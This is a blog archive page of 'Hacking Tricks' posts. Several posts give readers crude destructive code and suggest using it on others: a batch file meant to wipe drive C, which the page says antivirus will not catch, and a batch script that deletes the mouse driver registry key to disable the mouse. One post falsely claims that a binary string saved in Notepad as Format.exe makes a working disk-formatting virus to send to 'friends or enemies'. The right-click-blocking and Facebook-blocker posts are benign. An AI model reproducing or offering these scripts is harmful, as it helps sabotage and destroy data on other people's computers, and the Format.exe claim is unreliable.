Showing posts with label Hacking Tricks. Show all posts

Make Virus to Format Hard Disk

0 comments

Virus to Format Hard Disk

Today i will show you how to make a virus to format Hard disk. You can send this file toyour friend or enemy to format their Hard disk. But please dont try this on your own computer or else you will end up formatting your own computer.
  • Copy the below codes into Notepad.
01001011000111110010010101010101010000011111100000
  • Save the file as Format.exe
  • You have created your virus. Enjoy !!!

Read More »

Make Dangerous Virus In A Minute

0 comments

Learn To Make Dangerous Virus In A Minute


In my previous post i had teach you guys to create virus that disable mouse andVirus to format Hard Disk. In this post i will teach you to make simple yet very powerfull or you can say harmfull computer virus using a batch file. No software is required to make this virus, Noteapad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.


 

What will this virus do ?

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus.

How to Make the virus ?

1. Open Notepad and copy below code into it.
 
@Echo off
Del C:\ *.* |y

2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
 
It's cooool

Read More »

Make Virus that disable Mouse

0 comments

Make a virus that disable Mouse



Today we are goning to make a batch virus which is harmfull it will disable your mouse so think before trying it on yourself.

Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  • Save this file as virus.bat
  • Done, you just created your virus.

Read More »

Disable Right Click On Your Website Or Blog

0 comments

How To Disable Right Click On Your Website Or Blog ?


 Disable Right Click for blog
If you own a blog or a website then you always want to prevent other malicious bloggers from copying the content from your blog. You might have written an article with great efforts and lots of research and other just copy/paste it on their blog. To prevent such users from copying content from your blog i will show you Javascript Trick to disableright click on your blog. So lets get started.

How To Disable Right Click On Your Blog ?

1. Got to your blogger Dashboard and then Click on Layout.
blogger widget

2. Now Click on Add Gadget and select Html/Javascript.
blogger widget
3. Now paste code given below in the pop up window.
< !--MBW Code-->
< script language='JavaScript1.2'>
function disableselect(e){
return false
}
function reEnable(){
return true
}
document.onselectstart=new Function ("return false")
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
< /script>
< !--Code End http://mybloggersworld.blogspot.in>

 
4. Save it and done. Now users will not be able to right click on your website. 5. If you like to disable mouse on your computer then check out tutorial given below.
 
Try This

Read More »

Block FaceBook On your PC

0 comments
In this tutorial i will share with you guys an amazing programme or small little tool that will allow you block facebook on your computer easily in just few simple steps. So lets get started

 


How To Use Facebook Blocker ?

1. First download Facebook Blocker by Clicking Here
2. Extract the file and right click on Facebook Blocker.exe and run it as administator(Important)
3. Press 1 in order to backup your host file to be on the safe side.
facebook blocker
4. Now Press 2 to block facebook
5. Its time to check if facebook is blocked or not to do that Press 5
6. Hope this help you if you have any question leave a comment below.
 
Good Luck


Read More »
Web Hosting